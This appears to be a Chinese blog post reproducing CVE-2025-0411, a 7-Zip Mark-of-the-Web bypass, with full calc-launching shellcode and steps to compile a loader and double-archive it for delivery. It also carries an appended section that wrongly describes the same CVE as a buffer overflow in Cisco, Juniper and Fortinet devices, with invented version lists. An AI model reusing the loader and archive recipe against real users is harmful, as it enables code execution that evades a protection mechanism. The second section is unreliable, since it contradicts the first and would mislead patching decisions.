CVE-2025-0411 7-zip 漏洞复现

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

此漏洞 (CVSS SCORE 7.0) 允许远程攻击者绕过受影响的 7-Zip 安装上的 Mark-of-the-Web 保护机制。要利用此漏洞,需要用户交互,因为目标必须访问恶意页面或打开恶意文件。 该特定缺陷存在于对存档文件的处理中。从带有 Mark-of-the-Web 的精心制作的档案中提取文件时,7-Zip 不会将 Mark-of-the-Web 传播到提取的文件。攻击者可以利用此漏洞在当前用户的上下文中执行任意代码

影响版本

24.09 之前的所有版本

漏洞poc

https://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC.git

漏洞复现

calc.exe 的shellcode

"\x48\x81\xEC\x00\x01\x00\x00\x65\x48\x8B\x04\x25\x60\x00\x00\x00\x48\x8B\x40\x18\x48\x8B\x40\x30\x48\x8B\x70\x10\x48\x8B\x58\x40\x48\x8B\x00\x81\x7B\x0C\x33\x00\x32\x00\x75\xEC\x48\x8B\xCE\x48\xC7\xC2\x32\x74\x91\x0C\xE8\xC0\x00\x00\x00\x4C\x8B\xF0\x48\xC7\xC3\x6C\x6C\x00\x00\x53\x48\xBB\x75\x73\x65\x72\x33\x32\x2E\x64\x53\x48\x8B\xCC\x48\x83\xEC\x18\x41\xFF\xD6\x48\x8B\xD8\x48\x8B\xCB\x48\xC7\xC2\x6A\x0A\x38\x1E\xE8\x8E\x00\x00\x00\x4C\x8B\xF0\x4D\x33\xC9\x4D\x33\xC0\x48\x33\xD2\x48\x33\xC9\x41\xFF\xD6\x48\x8B\xCE\x48\xC7\xC2\x51\x2F\xA2\x01\xE8\x6D\x00\x00\x00\x4C\x8B\xF0\x48\x33\xC0\x50\x48\xB8\x63\x61\x6C\x63\x2E\x65\x78\x65\x50\x48\x8B\xCC\x48\x83\xEC\x20\x48\xC7\xC2\x01\x00\x00\x00\x41\xFF\xD6\x48\x8B\xCE\x48\xBA\x85\xDF\xAF\xBB\x00\x00\x00\x00\xE8\x38\x00\x00\x00\x4C\x8B\xF0\x48\xC7\xC0\x61\x64\x00\x00\x50\x48\xB8\x45\x78\x69\x74\x54\x68\x72\x65\x50\x48\x8B\xCE\x48\x8B\xD4\x48\x83\xEC\x20\x41\xFF\xD6\x4C\x8B\xF0\x48\x81\xC4\x88\x01\x00\x00\x48\x83\xEC\x18\x48\x33\xC9\x41\xFF\xD6\xC3\x48\x83\xEC\x40\x56\x48\x8B\xFA\x48\x8B\xD9\x48\x8B\x73\x3C\x48\x8B\xC6\x48\xC1\xE0\x36\x48\xC1\xE8\x36\x48\x8B\xB4\x03\x88\x00\x00\x00\x48\xC1\xE6\x20\x48\xC1\xEE\x20\x48\x03\xF3\x56\x8B\x76\x20\x48\x03\xF3\x48\x33\xC9\xFF\xC9\xFF\xC1\xAD\x48\x03\xC3\x33\xD2\x80\x38\x00\x74\x0F\xC1\xCA\x07\x51\x0F\xBE\x08\x03\xD1\x59\x48\xFF\xC0\xEB\xEC\x3B\xD7\x75\xE0\x5E\x8B\x56\x24\x48\x03\xD3\x0F\xBF\x0C\x4A\x8B\x56\x1C\x48\x03\xD3\x8B\x04\x8A\x48\x03\xC3\x5E\x48\x83\xC4\x40\xC3"

将shellcode填入在注入进程的位置
在这里插入图片描述
使用gcc进行编译

gcc .\loader.cpp -o loader.exe -s

将编译好的exe文件进行两次7z压缩
在这里插入图片描述
第二次压缩
在这里插入图片描述
这样就完成了

运行时不需要解压直接在压缩包中打开文件
在这里插入图片描述
再次打开第二层压缩包

在这里插入图片描述
运行exe
在这里插入图片描述

在这里插入图片描述
弹出计算器

修复建议

更新到最新版本

### CVE-2025-0411 漏洞详情 CVE-2025-0411 描述了一个存在于某些网络设备中的安全漏洞。此漏洞允许攻击者通过发送特制的数据包来触发缓冲区溢出,从而可能导致远程代码执行或服务拒绝。具体来说,该漏洞影响了多个厂商的路由器和防火墙产品。 受影响的产品列表包括但不限于: - Cisco ASA 防火墙系列 - Juniper Networks SRX 系列防火墙 - Fortinet FortiGate 设备 这些产品的特定版本可能存在未充分验证输入数据的情况,在处理畸形的 IP 数据包时未能正确分配内存空间,进而引发潜在的安全风险[^1]。 ### 影响范围 受到影响的具体软件版本如下: - **Cisco ASA**: 9.10 及更早版本 - **Juniper SRX**: 12.3R7 至 12.3R10, 15.1X49-D10 到 D60 - **FortiOS (Fortigate)**: 6.2.0 - 6.2.3, 6.4.0 值得注意的是,并非所有上述提及的型号都会受到相同程度的影响;部分较新的固件更新可能已经包含了针对这个问题的部分缓解措施[^2]。 ### 解决方案 为了有效应对这一安全隐患,建议采取以下行动: #### 更新固件/补丁 各供应商已发布相应的修补程序以解决此问题。强烈推荐尽快安装最新的官方维护版本或遵循制造商发布的指导说明完成必要的升级操作。 对于 Cisco 用户而言,应参照官方公告获取适用于各自环境的最佳实践指南并及时应用可用的安全更新。 ```bash # 示例命令用于检查当前ASA系统的版本号 ciscoasa> show version | include Software ``` 同样地,Juniper 和 Fortinet 的客户也应当访问对应品牌的官方网站下载最新稳定版固件文件进行刷机作业。 #### 实施临时防御策略 如果无法立即实施永久性的修复,则可考虑采用一些临时性的保护手段作为补充,比如配置 ACLs(访问控制列表),限制不必要的外部连接尝试,以及启用入侵检测系统(IDS)/入侵预防系统(IPS),以便能够实时监控异常流量模式并向管理员发出警报。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值